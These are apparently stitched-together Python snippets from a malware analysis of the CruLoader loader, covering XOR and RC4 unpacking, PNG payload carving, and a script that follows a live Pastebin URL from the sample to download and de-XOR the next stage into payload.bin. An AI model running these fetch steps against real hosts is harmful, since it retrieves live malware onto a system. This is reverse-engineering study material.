def test_xor(): assert xor( 0xff, b"\x97\x9a\x93\x93\x90\xdf\x88\x90\x8d\x93\x9b" ) == b"hello world" assert xor( b"hi!", b"\x00\x0cM\x04\x06\x01\x1f\x06S\x04\r" ) == b"hello world"
rc4_key = get_rsrc[key_offset:key_offset+key_size] encrypted = get_rsrc[28:] decrypted = rc4(rc4_key, encrypted) print("[+] Second layer unpacked") if decrypted[0:2].decode('latin1') != "MZ": print("[-] RC4 decryption failed") # Seems malduck ROL needs data type int according to the documentation else: convert_rol = (decrypted[0:]) for index,value in enumerate(convert_rol): a = rol(value, 4, bits=8) #convert back to bytes for malduck.xor b = bytes(chr(a), 'latin1') dexor = xor(0xC5, b) s += dexor rolxor_data = (s.decode('latin-1')) # Iterate throught the data to find any regexp matches get_urls = url_regexp.finditer(rolxor_data) for matched_value in get_urls: matched_url = (matched_value.group()) #URL found in CruLoader sample url = matched_url print("[+] Found URL in file: " + url) r = requests.get(f'{url}', headers=headers) first_response = r.content.decode('utf-8') #Parse the data from the Pastebin webpage and send a new request
#!/usr/bin/env python3 import sys import malduck infile = sys.argv[1] with open(infile, 'rb') as f: payload = f.read() #.decode('latin1') png_marker = bytes('redaolurc', 'latin1') m = payload.find(png_marker) png_marker_len = len('redaolurc') trimmed_file = (payload[m + png_marker_len:]) dexor = malduck.xor(0x61, trimmed_file) with open('trimmed.bin', 'wb') as o: o.write(dexor)
#Todo brute XOR instead of static hex value, possibly using malduck Yara #Todo 2 trim de-XOR:ed MZ file. For now I am piping the download payload througth the tool "cut-bytes.py '[4D5A90]':" from Didier Stevens. import requests import malduck #URL found in CruLoader sample url = 'https://pastebin.com/raw/mLem9DGk' #Change the User-Agent to look less suspicius headers = {'User-Agent': 'cruloader'} r = requests.get(f'{url}', headers=headers) first_response = r.content.decode('utf-8') #Parse the data from the Pastebin webpage and send a new request new_url = first_response n = requests.get(f'{new_url}', headers=headers) payload = n.content # De-XOR payload key = 0x61 payload = payload decrypted = malduck.xor(key, payload) # Write payload to disk with open("payload.bin", 'wb') as o: o.write(decrypted)